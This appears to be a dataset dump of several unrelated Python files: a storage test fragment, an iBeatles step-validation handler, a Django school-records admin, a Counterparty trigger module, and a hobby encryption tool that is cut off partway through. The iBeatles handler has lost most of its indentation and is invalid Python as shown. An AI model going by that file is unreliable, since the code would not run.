        assert storage.size(self.TEST_FILE_NAME) == len(self.TEST_FILE_CONTENT)
    def test_should_return_publicly_downloadable_url(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert urlopen(storage.url(self.TEST_FILE_NAME)).read() == self.TEST_FILE_CONTENT
    def test_should_work_with_utf8(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
        storage.exists(self.TEST_FILE_NAME_UNICODE)
        # Don't explode when trying to find a available name for existing files...
        self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
    def test_should_be_able_to_list_dirs_and_files(self, storage):
        subdir_file_pattern = "/subdir/%s.%d"
        for i in range(1, 11):
            self.upload_test_file(storage, subdir_file_pattern % (self.TEST_FILE_NAME, i), "")
        self.upload_test_file(storage, "/subdir/a/" + self.TEST_FILE_NAME, "")
        self.upload_test_file(storage, "/subdir/b/" + self.TEST_FILE_NAME, "")
        # Make sure paths prefixed with a slash are normalized
        assert storage.listdir("") == storage.listdir("/")
        assert storage.listdir("subdir") == storage.listdir("/subdir")
        root_list_dir = storage.listdir("")
        assert len(root_list_dir[0]) == 1 and len(root_list_dir[1]) == 0
        assert root_list_dir[0] == ["subdir"]
        subdir_list_dir = storage.listdir("subdir/")
        assert len(subdir_list_dir[0]) == 2 and len(subdir_list_dir[1]) == 10
        assert subdir_list_dir[0] == ["a", "b"]
        assert subdir_list_dir[1][0] == "%s.%d" % (self.TEST_FILE_NAME, 1)
    def test_should_not_overwrite_files_on_save(self, storage):
        # Second save with the same name must create a new blob, not replace.
        self.upload_test_file(storage, self.TEST_FILE_NAME, "")
        self.upload_test_file(storage, self.TEST_FILE_NAME, "")
        assert len(storage.listdir("")[1]) == 2
    def test_changed_files_should_be_reuploaded(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, "")
        first_modified_time = storage.modified_time(self.TEST_FILE_NAME)
        local_tmpfile = storage.open(self.TEST_FILE_NAME)
        assert local_tmpfile.read() == "".encode("ascii")
        local_tmpfile.seek(0)
        local_tmpfile.write(self.TEST_FILE_CONTENT)
        local_tmpfile.close()
        assert storage.open(self.TEST_FILE_NAME).read() == self.TEST_FILE_CONTENT
        assert storage.modified_time(self.TEST_FILE_NAME) != first_modified_time
| 1.976563 | 2 |
src/iBeatles/all_steps/event_handler.py | ornlneutronimaging/iBeatles | 3 | 12765118 | <gh_stars>1-10
from .. import DataType
from ..utilities.status_message_config import StatusMessageStatus, show_status_message
from qtpy.QtWidgets import QMessageBox
import logging
class EventHandler:
    def __init__(self, parent=None, data_type='sample'):
        # parent: the main application window (provides data_metadata and the
        # status bar); data_type: which data set this handler operates on.
        self.parent = parent
        self.data_type = data_type
    def _display_status_message_warning(self, message=""):
        """Show *message* in the parent's status bar as a 5-second warning."""
        show_status_message(parent=self.parent,
                            status=StatusMessageStatus.warning,
                            message=message,
                            duration_s=5)
def is_step_selected_allowed(self, step_index_requested=0):
""" 0: load data
1: normalization
2: normalized
3: bin
4: fit
5: strain mapping
6: rotation
"""
# load tab
# validate all the time
if step_index_requested == 0:
return True
# normalization
# validate only if data loaded
if step_index_requested == 1:
if self.parent.data_metadata[DataType.sample]['data'] == []:
message = "Please load some sample data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# normalized
# validate all the time
if step_index_requested == 2:
return True
# bin
# validate only if normalized data loaded
if step_index_requested == 3:
if self.parent.data_metadata[DataType.normalized]['data'] == []:
message = "Please load some normalized data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# fitting
# validate if there is a bin region selected
if step_index_requested == 4:
if self.parent.data_metadata[DataType.normalized]['data'] == []:
message = "Please load some normalized data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
if not self.parent.there_is_a_roi:
message = "Please select a region to bin first (step binning)!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# strain mapping
# validate if fitting has been performed
if step_index_requested == 5:
if self.parent.table_dictionary == {}:
message = "Please fit the data to be able to visualize the strain mapping!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# rotation
# validate if normalized data loaded
if step_index_requested == 6:
if self.parent.data_metadata[DataType.normalized]['data'] == []:
message = "Please load some normalized data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
return True
def _display_message_box(self, message=""):
dlg = QMessageBox(self.parent)
dlg.setWindowTitle("Unable to start this step!")
dlg.setText(message)
dlg.setStandardButtons(QMessageBox.Ok)
dlg.setIcon(QMessageBox.Warning)
button = dlg.exec()
if button == QMessageBox.Ok:
dlg.close()
@staticmethod
def _update_logging(step_requested=-1, message=""):
logging.info(f"Error requesting step #{step_requested}")
logging.info(message)
| 2.125 | 2 |
sis/admin.py | rectory-school/rectory-apps-updated | 0 | 12765119 | <gh_stars>0
"""SIS Admin"""
from datetime import date, timedelta
from django.contrib import admin
from django.db.models import Count, Max
from django.utils.translation import gettext_lazy as _
from solo.admin import SingletonModelAdmin
from . import models
class ViewOnlyAdminMixin:
    """Mixin that turns a ModelAdmin into a strictly read-only view.

    Denies add, delete, and change permissions unconditionally; list and
    detail pages remain browsable.
    """

    def has_add_permission(self, request) -> bool:
        """Adding records through the admin is never allowed."""
        del request  # unused argument
        return False

    def has_delete_permission(self, request, obj=None) -> bool:
        """Deleting records through the admin is never allowed."""
        del request, obj  # unused arguments
        return False

    def has_change_permission(self, request, obj=None) -> bool:
        """Editing records through the admin is never allowed."""
        del request, obj  # unused arguments
        return False
@admin.register(models.Config)
class ConfigAdmin(SingletonModelAdmin):
    """Admin for the singleton SIS configuration record (django-solo)."""
@admin.register(models.AcademicYear)
class AcademicYearAdmin(admin.ModelAdmin):
    """Academic year admin with default add/change/delete behavior."""
@admin.register(models.Student)
class StudentAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """Read-only student admin; records are managed by the SIS sync."""
@admin.register(models.Teacher)
class TeacherAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """View-only teacher admin"""

    # Allow lookup by any identifying field.
    search_fields = ['last_name', 'first_name', 'email', 'teacher_id', 'unique_name', ]
    list_filter = ['active']
    list_display = ['name', 'email', 'active']
@admin.register(models.Dorm)
class DormAdmin(admin.ModelAdmin):
    """Dorm admin with default add/change/delete behavior."""
@admin.register(models.Grade)
class GradeAdmin(admin.ModelAdmin):
    """Grade admin: the grade value itself is read-only and new grades
    cannot be added by hand."""

    readonly_fields = ['grade']

    def has_add_permission(self, request) -> bool:
        # Grades are never created through the admin.
        return False
@admin.register(models.Enrollment)
class EnrollmentAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """View only enrollment admin"""

    def get_queryset(self, request):
        # Fetch related rows in one query to avoid N+1 lookups in the list view.
        qs = super().get_queryset(request)
        return qs.select_related('student', 'academic_year')

    list_display = ['__str__', 'boarder']
    list_filter = ['academic_year', 'grade', 'boarder', 'status_attending', 'status_enrollment']
@admin.register(models.Course)
class CourseAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """View only course admin; records are managed by the SIS sync."""
@admin.register(models.Section)
class SectionAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """View only section admin"""

    def get_queryset(self, request):
        # Fetch the academic year in the same query for list rendering.
        qs = super().get_queryset(request)
        return qs.select_related('academic_year')
@admin.register(models.StudentRegistration)
class StudentRegistrationAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """View only student registration admin"""

    def get_queryset(self, request):
        # Fetch section, its year, and the student in one query.
        qs = super().get_queryset(request)
        return qs.select_related('section__academic_year', 'section', 'student')
@admin.register(models.Parent)
class ParentAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """View only parent admin"""

    list_display = ['full_id', 'full_name', 'first_name', 'last_name']
class DetentionUsed(admin.SimpleListFilter):
    """Sidebar filter selecting offenses by when they were last used."""

    parameter_name = 'used_recently'
    title = _('used recently')

    def lookups(self, request, model_admin):
        # (query value in days, human-readable label)
        return (
            ('365', _('Within the last year')),
            ('30', _('Within the last month')),
        )

    def queryset(self, request, queryset):
        # No selection made: leave the queryset untouched.
        if not self.value():
            return queryset

        limit = int(self.value())
        # Annotate each offense with its most recent detention date and keep
        # only those used within the selected window.
        queryset = queryset.annotate(latest_detention=Max('detentions__date'))
        return queryset.filter(latest_detention__gte=date.today() - timedelta(days=limit))
@admin.register(models.DetentionOffense)
class DetentionOffenseView(admin.ModelAdmin):
    """Detention offense model admin.

    The offense text is read-only and new offenses cannot be created by hand;
    only ``send_mail`` is editable.
    """

    readonly_fields = ['offense']
    list_filter = ['send_mail', DetentionUsed]
    list_display = ['__str__', 'send_mail']

    # The previous get_queryset override returned the parent queryset
    # unchanged (its filtering was commented out), so it has been removed.

    def has_add_permission(self, request) -> bool:
        # Offenses are never created through the admin.
        return False
@admin.register(models.DetentionCode)
class DetentionCodeAdmin(admin.ModelAdmin):
    """Admin for detention codes; the code itself is read-only and new
    codes cannot be added by hand."""

    readonly_fields = ['code']

    def has_add_permission(self, request) -> bool:
        # Codes are never created through the admin.
        return False
@admin.register(models.Detention)
class DetentionAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
    """View only admin for detentions"""

    list_filter = ['date', 'code']

    def get_queryset(self, request):
        # Fetch related rows in one query to avoid N+1 lookups in the list view.
        qs = super().get_queryset(request)
        return qs.select_related('code', 'offense', 'student')
| 2.109375 | 2 |
counterpartylib/lib/messages/trigger.py | monaparty/counterparty-lib | 9 | 12765120 | <filename>counterpartylib/lib/messages/trigger.py
#! /usr/bin/python3
"""
target_hash is the hash of a trigger.
"""
import binascii
import struct
import json
import logging
logger = logging.getLogger(__name__)
from counterpartylib.lib import (config, exceptions, util, message_type)
from . import (order, bet, rps)
from counterpartylib.lib.messages.triggers import (asset_metadata)
# Wire layout of a trigger message: a fixed 32-byte target hash, followed by a
# free-form payload (the payload is not covered by FORMAT; see parse()).
FORMAT = '>32s'
LENGTH = 32
ID = 120

# Receivers that may handle a trigger; each owns one target table
# (see validate(), which looks the target hash up in every receiver's table).
receivers = [
    asset_metadata.asset_metadata_receiver,
]
def initialise (db):
    """Create the ``triggers`` table and its indexes, then let every
    registered receiver create its own auxiliary tables.

    :param db: Database connection
    """
    cursor = db.cursor()
    cursor.execute('''CREATE TABLE IF NOT EXISTS triggers(
                      tx_index INTEGER PRIMARY KEY,
                      tx_hash TEXT UNIQUE,
                      block_index INTEGER,
                      source TEXT,
                      target_hash TEXT,
                      payload BLOB,
                      status TEXT,
                      FOREIGN KEY (tx_index, tx_hash, block_index) REFERENCES transactions(tx_index, tx_hash, block_index))
                   ''')
    # Offer hash is not a foreign key. (And it cannot be, because of some invalid triggers.)
    cursor.execute('''CREATE INDEX IF NOT EXISTS
                      block_index_idx ON triggers (block_index)
                   ''')
    cursor.execute('''CREATE INDEX IF NOT EXISTS
                      source_idx ON triggers (source)
                   ''')

    for receiver in receivers:
        # Each receiver may create its own tables.
        receiver.initialise(db)
def validate (db, source, target_hash, payload_bytes):
    """Validate a trigger against its target and the source's XCP balance.

    Looks ``target_hash`` up in each receiver's target table, instantiates the
    (single) matching receiver, and collects its validation problems plus a
    flat-fee funds check.

    :param db: Database connection
    :param source: Source address (str)
    :param target_hash: Hex hash of the trigger target (str)
    :param payload_bytes: Raw payload (bytes)
    :return: Tuple (receiver instance or None, fee, list of problem strings)
    """
    problems = []
    targets = []
    target_type = None
    cursor = db.cursor()
    receiver_instance = None
    for receiver in receivers:
        sql = 'SELECT tx_hash FROM ' + receiver.target_table_name() + ' WHERE tx_hash = ?'
        cursor.execute(sql, (target_hash,))
        targets = cursor.fetchall()
        if targets:
            # A hash must match at most one receiver, and hashes are unique
            # within a table.
            assert receiver_instance is None
            assert len(targets) == 1
            receiver_instance = receiver(db, source, target_hash, payload_bytes)
            problems += receiver_instance.validate()
    if receiver_instance is None:
        problems.append('no trigger target with that hash')

    # Flat fee of 0.001 XCP, debited in parse() when the trigger is valid.
    fee = int(0.001 * config.UNIT)
    cursor.execute('''SELECT * FROM balances
                      WHERE (address = ? AND asset = ?)''', (source, config.XCP))
    balances = cursor.fetchall()
    if not balances or balances[0]['quantity'] < fee:
        problems.append('insufficient funds')

    return receiver_instance, fee, problems
def compose (db, source, target_hash, payload, payload_is_hex):
    """Compose a trigger transaction.

    :param db: Database connection
    :param source: Source address (str)
    :param target_hash: Hex hash of the trigger target (str)
    :param payload: Optional payload, hex or plain text (str or None)
    :param payload_is_hex: Whether ``payload`` is a hex string (bool)
    :return: Tuple (source, destination outputs, packed data bytes)
    :raises exceptions.ComposeError: On a malformed payload or validation problems.
    """
    # Convert payload to payload_bytes based on the payload_is_hex setting.
    if payload is None:
        payload_bytes = b''
    elif payload_is_hex:
        try:
            payload_bytes = bytes.fromhex(payload)
        except ValueError:
            raise exceptions.ComposeError(['failed to convert the payload'])
    else:
        # Bug fix: struct.pack(">{n}s") with n = len(payload) counted
        # *characters*, so multi-byte UTF-8 payloads were silently truncated
        # ('s' truncates to the field width). Encoding directly keeps every
        # byte and is identical for pure-ASCII payloads.
        payload_bytes = payload.encode('utf-8')

    # Check that the target exists and the source can afford the fee.
    _, _, problems = validate(db, source, target_hash, payload_bytes)
    if problems: raise exceptions.ComposeError(problems)

    target_hash_bytes = binascii.unhexlify(bytes(target_hash, 'utf-8'))

    data = message_type.pack(ID)
    data += struct.pack(FORMAT, target_hash_bytes)
    data += payload_bytes

    return (source, [], data)
def parse (db, tx, message):
    """Parse a trigger transaction: unpack, validate, execute, record, and
    debit the fee on success.

    :param db: Database connection
    :param tx: Transaction dict (tx_index, tx_hash, block_index, source, block_hash)
    :param message: Packed message (32-byte target hash + free-form payload)
    """
    cursor = db.cursor()

    status = 'valid'

    # Mempool transactions are not parsed.
    if tx['block_hash'] == 'mempool':
        return

    # Unpack message.
    try:
        # Everything after the fixed-size hash is the payload.
        payload_bytes_length = len(message) - LENGTH
        if payload_bytes_length < 0:
            raise exceptions.UnpackError('invalid message length')

        struct_format = FORMAT + ('{}s'.format(payload_bytes_length))
        target_hash_bytes, payload_bytes = struct.unpack(struct_format, message)
        target_hash = binascii.hexlify(target_hash_bytes).decode('utf-8')

    except (exceptions.UnpackError, struct.error):
        target_hash = None
        payload_bytes = None
        status = 'invalid: could not unpack'

    if status == 'valid':
        receiver, fee, problems = validate(db, tx['source'], target_hash, payload_bytes)
        if problems:
            status = 'invalid: ' + '; '.join(problems)

    if status == 'valid':
        try:
            problems += receiver.execute(tx)
            if problems:
                status = 'invalid: ' + '; '.join(problems)
        except Exception:
            # Receiver execution must never abort parsing; record the failure.
            # (Was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt.)
            status = 'invalid: execution failed'

    # Add parsed transaction to message-type–specific table.
    bindings = {
        'tx_index': tx['tx_index'],
        'tx_hash': tx['tx_hash'],
        'block_index': tx['block_index'],
        'source': tx['source'],
        'target_hash': target_hash,
        'payload': payload_bytes,
        'status': status,
    }
    if "integer overflow" not in status:
        sql = 'INSERT INTO triggers VALUES (:tx_index, :tx_hash, :block_index, :source, :target_hash, :payload, :status)'
        cursor.execute(sql, bindings)
    else:
        # logger.warn has been deprecated since Python 3.3; use warning().
        logger.warning("Not storing [trigger] tx [%s]: %s", tx['tx_hash'], status)
        logger.debug("Bindings: %s", json.dumps(bindings))

    # Only a fully valid trigger pays the fee.
    if status == 'valid':
        util.debit(db, tx['source'], config.XCP, fee, action="trigger fee", event=tx['tx_hash'])

    cursor.close()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| 2.21875 | 2 |
fincrypt.py | ThePlasmaRailgun/CryptoChallenge | 1 | 12765121 | <reponame>ThePlasmaRailgun/CryptoChallenge<filename>fincrypt.py
#!/usr/bin/env python3
import sha
import sys
import os
import argparse
import base64
import zlib
import randomart
import re
import ecc
import reedsolomon
import oaep
from asn1spec import FinCryptPublicKey, FinCryptPrivateKey, FinCryptMessage
from pyasn1.codec.ber.decoder import decode as decode_ber
from pyasn1.codec.native.encoder import encode as encode_native
from pyasn1.codec.der.encoder import encode as encode_der
from aes import Decrypter, Encrypter, AESModeOfOperationCBC
# Key locations, resolved relative to this file's directory.
BASE_PATH = os.path.dirname(__file__)
PUBLIC_PATH = os.path.join(BASE_PATH, 'public_keys')  # other parties' public keys
PRIVATE_KEY = os.path.join(BASE_PATH, 'private_key', 'private.asc')  # our private key
def _flatten(l):
return [item for sublist in l for item in sublist]
class FinCryptDecodingError(Exception):
    """Raised when a FinCrypt key or message cannot be decoded.

    The previous explicit __init__ only forwarded its arguments to
    Exception.__init__, which is exactly what the default does; it has
    been removed.
    """
def get_blocks(message, block_size=256):
    """
    Splits a message (bytes) into chunks of size block_size and encodes each
    chunk as a big-endian base-256 integer. Reversed by get_bytes.

    :param message: Message (bytes)
    :param block_size: Block size (int)
    :return: Blocks (list of int)
    """
    return [
        int.from_bytes(message[offset:offset + block_size], 'big')
        for offset in range(0, len(message), block_size)
    ]
def get_bytes(block_nums):
    """
    Turns a list of block integers back into bytes (big-endian base 256).

    Note: leading zero bytes of each block are not recovered -- a block value
    of 0 contributes no bytes at all (matches the historical behavior).

    :param block_nums: Blocks (list of ints)
    :return: Original data (bytes)
    """
    chunks = []
    for num in block_nums:
        width = (num.bit_length() + 7) // 8
        chunks.append(num.to_bytes(width, 'big'))
    return b''.join(chunks)
def sign_number(k, num):
    """
    Sign a number using ECDSA. ``num`` must have a lower bit length than
    ``ecc.CURVE.n``.

    :param k: ECC private key scalar (int)
    :param num: Number to sign (int)
    :return: Tuple (r (int), s (int))
    """
    private_key = ecc.ECPrivateKey(k, ecc.CURVE)
    return ecc.ECDSA(ecc.CURVE).sign(num, private_key)
def validate_number(kx, ky, r, s, num):
    """
    Validate an ECDSA signature (r, s) over ``num``.

    :param kx: Public key x coordinate (int)
    :param ky: Public key y coordinate (int)
    :param r: r value of signature (int)
    :param s: s value of signature (int)
    :param num: Signed number to validate (int)
    :return: Whether the signature is valid (bool)
    """
    public_key = ecc.ECPublicKey(ecc.AffineCurvePoint(kx, ky, ecc.CURVE))
    return ecc.ECDSA(ecc.CURVE).validate(r, s, num, public_key)
def encrypt_message(kx, ky, message):
    """
    Encrypts a message using ECIES and AES-256-CBC.

    Performs an ECIES exchange against the recipient's public point to obtain
    a shared secret, hashes str(secret) with SHA3-512 to derive the AES key
    (bytes 0..31) and CBC IV (bytes 32..47), then encrypts the OAEP-padded
    message with AES-CBC.

    NOTE:
      The exchange presumably generates fresh key material per call (see
      ecc.ECEIS.exchange -- confirm), so the same plaintext will not produce
      the same ciphertext twice. Keep this in mind if you require
      reproducible behavior.

    :param kx: Recipient public key x coordinate (int)
    :param ky: Recipient public key y coordinate (int)
    :param message: Message (bytes)
    :return: Tuple (transmitted curve point as (x, y) ints, ciphertext (bytes))
    """
    ecies = ecc.ECEIS(ecc.CURVE)
    r, s = ecies.exchange(ecc.ECPublicKey(ecc.AffineCurvePoint(kx, ky, ecc.CURVE)))
    # Derive symmetric key material from the shared secret:
    # digest[0:32] -> AES-256 key, digest[32:48] -> CBC IV.
    s = str(s).encode('utf-8')
    key = sha.SHA3_512(s).digest()
    message_encryptor = Encrypter(mode=AESModeOfOperationCBC(key[:32], iv=key[32:48]))
    encrypted_blocks = message_encryptor.feed(oaep.oaep_pad(message))
    encrypted_blocks += message_encryptor.feed()  # flush the final block
    encrypted_key = r.x, r.y
    return encrypted_key, encrypted_blocks
def decrypt_message(k, encrypted_key, encrypted_message):
    """
    Decrypts a message encrypted by the encrypt_message function.

    Recovers the ECIES shared secret from the transmitted curve point, then
    derives the AES-256 key and CBC IV exactly as encrypt_message does and
    AES-decrypts and OAEP-unpads the data.

    :param k: Private key scalar (int)
    :param encrypted_key: Transmitted curve point as (x, y) ints
    :param encrypted_message: AES encrypted data (bytes)
    :return: Decrypted data (bytes)
    """
    ecies = ecc.ECEIS(ecc.CURVE)
    r = ecc.AffineCurvePoint(encrypted_key[0], encrypted_key[1], ecc.CURVE)
    s = ecies.recover(r, ecc.ECPrivateKey(k, ecc.CURVE))

    # Same derivation as encrypt_message: SHA3-512(str(secret)) -> key || iv.
    s = str(s).encode('utf-8')
    key = sha.SHA3_512(s).digest()

    message_decryptor = Decrypter(mode=AESModeOfOperationCBC(key[:32], iv=key[32:48]))
    decrypted_message = message_decryptor.feed(encrypted_message)
    decrypted_message += message_decryptor.feed()  # flush the final block

    return oaep.oaep_unpad(decrypted_message)
def sign_message(k, message):
    """
    Sign a message with ECDSA: hash the plaintext with SHA3-512, encode the
    digest as a single integer block, and sign that integer.

    :param k: ECC private key scalar (int)
    :param message: Message to sign (bytes)
    :return: Signature tuple (r, s)
    """
    digest = sha.SHA3_512(message).digest()
    return sign_number(k, get_blocks(digest, 1024)[0])
def authenticate_message(kx, ky, plaintext, signature):
    """
    Verify a message signature: hash the plaintext with SHA3-512, encode the
    digest as a single integer block, and validate it against the ECDSA
    signature with the sender's public key.

    :param kx: ECC public key x coordinate (int)
    :param ky: ECC public key y coordinate (int)
    :param plaintext: Decrypted plaintext to verify (bytes)
    :param signature: Signature pair (r, s)
    :return: Whether the signature is valid (bool)
    """
    digest = sha.SHA3_512(plaintext).digest()
    digest_num = get_blocks(digest, 1024)[0]
    return validate_number(kx, ky, signature[0], signature[1], digest_num)
def strip_headers(pem_text):
    """
    Strips the armor headers off a FinCrypt key or message.

    :param pem_text: Text of key or message (string)
    :return: Tuple (header, e.g. 'BEGIN FINCRYPT MESSAGE', base64 body) or
        (None, None) when the text is not valid FinCrypt armor.
    """
    pattern = (
        r'(?:-+ (BEGIN FINCRYPT (?:PUBLIC |PRIVATE )?(?:KEY|MESSAGE)) -+\n)([a-zA-Z0-9\n\-_=]+[^\n])'
        r'(?:\n-+ END FINCRYPT (?:PUBLIC |PRIVATE )?(?:KEY|MESSAGE) -+)'
    )
    match = re.match(pattern, pem_text)
    if match is None:
        return None, None
    return match.group(1), match.group(2)
def read_message(message_text):
    """
    Strip and validate the armor headers of a FinCrypt message.

    :param message_text: Armored message text (string)
    :return: Base64 body of the message (string)
    :raises ValueError: If the text is not a well-formed FinCrypt message.
    """
    header, body = strip_headers(message_text)
    if header != 'BEGIN FINCRYPT MESSAGE':
        raise ValueError('Message was malformed.')
    return body
def read_public_key(key_text):
    """
    Reads a FinCrypt public key. Returns a dictionary of public key values.
    Raises an exception if the key is malformed or unreadable.

    The ASN.1 specification for a FinCrypt public key resides in asn1spec.py

    :param key_text: Key text (string)
    :return: Dict with keys 'kx', 'ky', 'name', 'email'
    """
    key_header, key_text = strip_headers(key_text)

    if key_header is None or key_header != 'BEGIN FINCRYPT PUBLIC KEY':
        raise ValueError

    b64_decoded = base64.urlsafe_b64decode(key_text.encode('utf-8'))

    # Public keys carry 30 Reed-Solomon ECC bytes (presumably matching the key
    # generator -- confirm); decoding repairs minor transcription errors
    # before BER parsing.
    rsc = reedsolomon.RSCodec(30)
    b64_decoded = bytes(rsc.decode(b64_decoded)[0])

    key, _ = decode_ber(b64_decoded, asn1Spec=FinCryptPublicKey())
    key = encode_native(key)

    return {'kx': key['kx'], 'ky': key['ky'], 'name': key['name'], 'email': key['email']}
def read_private_key(key_text):
    """
    Reads a FinCrypt private key. Returns a dictionary of usable private key
    values. Raises an exception if the key is malformed or unreadable.

    The ASN.1 specification for a FinCrypt private key resides in asn1spec.py

    :param key_text: Key text (string)
    :return: Dict with keys 'k', 'name', 'email'
    """
    key_header, key_text = strip_headers(key_text)

    if key_header is None or key_header != 'BEGIN FINCRYPT PRIVATE KEY':
        raise ValueError

    b64_decoded = base64.urlsafe_b64decode(key_text.encode('utf-8'))

    # NOTE(review): unlike read_public_key there is no Reed-Solomon decode
    # step here -- presumably private keys are stored without ECC bytes;
    # confirm against the key generator.
    key, _ = decode_ber(b64_decoded, asn1Spec=FinCryptPrivateKey())
    key = encode_native(key)

    return {'k': key['k'], 'name': key['name'], 'email': key['email']}
def encrypt_and_sign(message, recipient_key, signer_key):
    """
    Encrypts and signs a message.

    Reads the recipient's public key and the signer's private key from the
    given file-like objects, ECIES/AES-encrypts the message, ECDSA-signs the
    plaintext, then DER-encodes the result and appends Reed-Solomon error
    correction.

    The ASN.1 specification for a FinCrypt message resides in asn1spec.py

    :param message: Message to encrypt (bytes)
    :param recipient_key: Recipient's public key (file like object)
    :param signer_key: Signer's private key (file like object)
    :return: Bytes of the encrypted and encoded message and signature.
    :raises FinCryptDecodingError: If either key file is malformed, or
        encryption fails.
    """
    try:
        recipient_key = read_public_key(recipient_key.read())
    except Exception:
        raise FinCryptDecodingError('Recipient keyfile was malformed.')

    try:
        signer_key = read_private_key(signer_key.read())
    except Exception:
        raise FinCryptDecodingError('Private key file is malformed.')

    try:
        encrypted_key, encrypted_blocks = encrypt_message(recipient_key['kx'], recipient_key['ky'],
                                                          message)
    except Exception:
        raise FinCryptDecodingError('Unknown error encountered when encrypting message.')

    # Sign the *plaintext* so the recipient can verify after decryption.
    signature = sign_message(signer_key['k'], message)

    encrypted_message = FinCryptMessage()

    encrypted_message['message'] = encrypted_blocks
    encrypted_message['key'].extend(encrypted_key)
    encrypted_message['signature'].extend(signature)

    encoded_message = encode_der(encrypted_message)

    # 8 Reed-Solomon ECC bytes let the recipient repair minor corruption.
    rsc = reedsolomon.RSCodec(8)
    encoded_message = bytes(rsc.encode(encoded_message))

    return encoded_message
def decrypt_and_verify(message, sender_key, private_key):
    """
    Decrypts and verifies a message.

    Reads the decrypter's private key and the sender's public key from the
    given file-like objects, undoes the Reed-Solomon coding, BER-decodes the
    message, decrypts it, and checks the sender's ECDSA signature.

    The ASN.1 specification for a FinCrypt message resides in asn1spec.py

    :param message: Message to decrypt (bytes)
    :param sender_key: Sender's public key (file like object)
    :param private_key: Decrypter's private key (file like object)
    :return: Tuple (decrypted message (bytes), whether the message was verified (boolean))
        If message was unable to be decrypted, the tuple will be (None, False)
    :raises FinCryptDecodingError: If either key file is malformed.
    """
    try:
        decryption_key = read_private_key(private_key.read())
    except Exception:
        raise FinCryptDecodingError('Private key file is malformed.')

    try:
        sender_key = read_public_key(sender_key.read())
    except Exception:
        raise FinCryptDecodingError('Sender key file is malformed.')

    try:
        # Repair transmission errors, then BER-decode the ASN.1 structure.
        rsc = reedsolomon.RSCodec(8)
        message = bytes(rsc.decode(message)[0])
        decoded, _ = decode_ber(message, asn1Spec=FinCryptMessage())
        decoded = encode_native(decoded)
    except Exception:
        # Undecodable message: signal total failure instead of raising.
        return None, False

    try:
        decrypted_message = decrypt_message(decryption_key['k'], decoded['key'], decoded['message'])
    except Exception:
        decrypted_message = None

    try:
        authenticated = authenticate_message(sender_key['kx'], sender_key['ky'], decrypted_message,
                                             decoded['signature'])
    except Exception:
        authenticated = False

    return decrypted_message, authenticated
def encrypt_text(arguments):
    """
    Encrypts a file object when given an argparser arguments object. Not
    intended for use as an import.

    Compresses the input (zlib level 9), encrypts and signs it, and writes
    the armored (base64, wrapped at 76 columns) FinCrypt message to stdout.

    :param arguments: Argparser arguments object.
    :return: None
    :raises FileNotFoundError: If either key file is missing.
    """
    recipient_keyfile = os.path.join(PUBLIC_PATH, arguments.recipient)

    if not os.path.exists(recipient_keyfile):
        raise FileNotFoundError('Recipient keyfile does not exist.')

    if not os.path.exists(PRIVATE_KEY):
        raise FileNotFoundError('Private keyfile does not exist.')

    with open(recipient_keyfile) as recipient_key, open(PRIVATE_KEY) as private_key:
        message = encrypt_and_sign(zlib.compress(arguments.infile.read(), level=9), recipient_key, private_key)

    message = base64.urlsafe_b64encode(message).decode('utf-8')

    # PEM-style armor: header line, body wrapped at 76 characters, footer.
    sys.stdout.write(' BEGIN FINCRYPT MESSAGE '.center(76, '-') + '\n')
    sys.stdout.write('\n'.join([message[i:i + 76] for i in range(0, len(message), 76)]))
    sys.stdout.write('\n' + ' END FINCRYPT MESSAGE '.center(76, '-'))
def decrypt_text(arguments):
    """
    Decrypts a file object when given an argparser arguments object. Not
    intended for use as an import.

    Reads the file object as an armored FinCrypt message, writes the
    decrypted, decompressed bytes to stdout, and reports decryption or
    verification failures on stderr.

    :param arguments: Argparser arguments object.
    :return: None
    :raises FileNotFoundError: If either key file is missing.
    """
    sender_keyfile = os.path.join(PUBLIC_PATH, arguments.sender)

    if not os.path.exists(sender_keyfile):
        raise FileNotFoundError('Sender keyfile does not exist.')

    if not os.path.exists(PRIVATE_KEY):
        raise FileNotFoundError('Private keyfile does not exist.')

    try:
        in_message = read_message(arguments.infile.read())
        in_message = ''.join(in_message.split('\n'))  # undo the 76-column wrap
        in_message = base64.urlsafe_b64decode(in_message)
    except Exception:
        sys.stderr.write('Message was malformed.\n')
        return

    try:
        with open(PRIVATE_KEY) as private_key, open(sender_keyfile) as sender_key:
            message, verified = decrypt_and_verify(in_message, sender_key, private_key)
    except Exception as e:
        sys.stderr.write(str(e) + '\n')
        return

    if message is None:
        sys.stderr.write('Decryption failed.\n')
    else:
        try:
            sys.stdout.buffer.write(zlib.decompress(message))
        except Exception:
            sys.stderr.write('Decompression failed.\n')

    if not verified:
        sys.stderr.write('Verification failed. Message is not intact.\n')
def encrypt_binary(arguments):
    """
    Encrypts a file object when given an argparser arguments object. Not
    intended for use as an import.

    Same as encrypt_text, but writes the raw binary message (no base64 armor)
    to stdout for space savings.

    :param arguments: Argparser arguments object.
    :return: None
    :raises FileNotFoundError: If either key file is missing.
